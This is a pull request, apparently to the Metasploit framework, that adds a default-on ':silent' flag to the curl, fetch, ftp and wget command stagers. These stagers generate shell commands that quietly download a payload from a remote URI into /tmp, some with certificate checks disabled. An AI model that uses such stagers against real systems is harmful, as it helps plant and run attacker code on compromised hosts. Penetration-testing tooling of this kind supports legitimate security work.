### PR TITLE
Add a :silent option to silence commands used in HTTP command stagers

### DIFF
--- a/lib/rex/exploitation/cmdstager/curl.rb
+++ b/lib/rex/exploitation/cmdstager/curl.rb
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
 
     opts[:temp] ||= '/tmp'
     opts[:file] ||= Rex::Text.rand_text_alpha(8)
+    opts[:silent] = true if opts[:silent].nil?
     @payload_path = "#{opts[:temp]}/#{opts[:file]}"
 
     super
@@ -25,12 +26,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
   def generate_cmds_payload(opts)
     cmds = []
     uri = opts[:payload_uri]
+    silent_flag = opts[:silent] ? 's' : ''
 
     if opts[:ssl]
-      cmds << "curl -kso #{@payload_path} #{uri}"
+      cmds << "curl -#{silent_flag}ko #{@payload_path} #{uri}"
     else
       uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
-      cmds << "curl -so #{@payload_path} #{uri}"
+      cmds << "curl -#{silent_flag}o #{@payload_path} #{uri}"
     end
 
     cmds

--- a/lib/rex/exploitation/cmdstager/fetch.rb
+++ b/lib/rex/exploitation/cmdstager/fetch.rb
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
 
     opts[:temp] ||= '/tmp'
     opts[:file] ||= Rex::Text.rand_text_alpha(8)
+    opts[:silent] = true if opts[:silent].nil?
     @payload_path = "#{opts[:temp]}/#{opts[:file]}"
 
     super
@@ -26,10 +27,11 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
     cmds = []
     nvp  = '--no-verify-peer'
 
+    silent_flag = opts[:silent] ? 'q' : ''
     if opts[:ssl]
-      cmds << "fetch -qo #{@payload_path} #{nvp} #{opts[:payload_uri]}"
+      cmds << "fetch -#{silent_flag}o #{@payload_path} #{nvp} #{opts[:payload_uri]}"
     else
-      cmds << "fetch -qo #{@payload_path} #{opts[:payload_uri]}"
+      cmds << "fetch -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"
     end
 
     cmds

--- a/lib/rex/exploitation/cmdstager/ftp_http.rb
+++ b/lib/rex/exploitation/cmdstager/ftp_http.rb
@@ -17,14 +17,17 @@ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
 
     opts[:temp] ||= '/tmp'
     opts[:file] ||= Rex::Text.rand_text_alpha(8)
+    opts[:silent] = true if opts[:silent].nil?
     @payload_path = "#{opts[:temp]}/#{opts[:file]}"
 
     super
   end
 
   def generate_cmds_payload(opts)
+    # -V: disable verbose output (quiet mode)
+    silent_flag = opts[:silent] ? 'V' : ''
     # -o: output file name (argument must be before URL)
-    ["ftp -o #{@payload_path} #{opts[:payload_uri]}"]
+    ["ftp -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"]
   end
 
   def generate_cmds_decoder(opts)

--- a/lib/rex/exploitation/cmdstager/wget.rb
+++ b/lib/rex/exploitation/cmdstager/wget.rb
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
 
     opts[:temp] ||= '/tmp'
     opts[:file] ||= Rex::Text.rand_text_alpha(8)
+    opts[:silent] = true if opts[:silent].nil?
     @payload_path = "#{opts[:temp]}/#{opts[:file]}"
 
     super
@@ -27,12 +28,13 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
 
     uri = opts[:payload_uri]
     ncc  = '--no-check-certificate'
+    silent_flag = opts[:silent] ? 'q' : ''
 
     if opts[:ssl]
-      cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
+      cmds << "wget -#{silent_flag}O #{@payload_path} #{ncc} #{uri}"
     else
       uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
-      cmds << "wget -qO #{@payload_path} #{uri}"
+      cmds << "wget -#{silent_flag}O #{@payload_path} #{uri}"
     end
 
     cmds


### PR DESCRIPTION
Resolves #36. Enabled by default to preserve existing behaviour. Users can opt out by specifying `silent: false`.

@wvu